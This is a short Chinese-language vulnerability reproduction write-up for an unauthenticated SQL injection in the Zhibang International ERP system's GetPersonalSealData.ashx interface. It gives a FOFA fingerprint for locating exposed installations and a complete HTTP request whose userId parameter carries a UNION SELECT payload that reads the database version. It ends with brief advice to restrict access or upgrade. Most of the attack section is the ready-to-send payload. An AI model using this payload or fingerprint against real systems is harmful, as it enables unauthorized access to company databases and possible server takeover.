智邦国际ERP系统 SQL注入漏洞复现

0x01 产品简介

北京智邦国际软件技术有限公司的ERP系统是一种集成化的企业资源计划（Enterprise Resource Planning，简称ERP）解决方案，旨在帮助企业实现高效的运营管理和资源优化。

0x02 漏洞概述

智邦国际ERP系统 GetPersonalSealData.ashx接口处存在SQL注入漏洞，未经身份认证的攻击者可利用此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

0x03 复现环境

FOFA：icon_hash="-682445886"

0x04 漏洞复现

PoC

GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version-- HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1

查询数据库版本 

0x05 修复建议

 关闭互联网暴露面或接口处设置访问权限

 升级至安全版本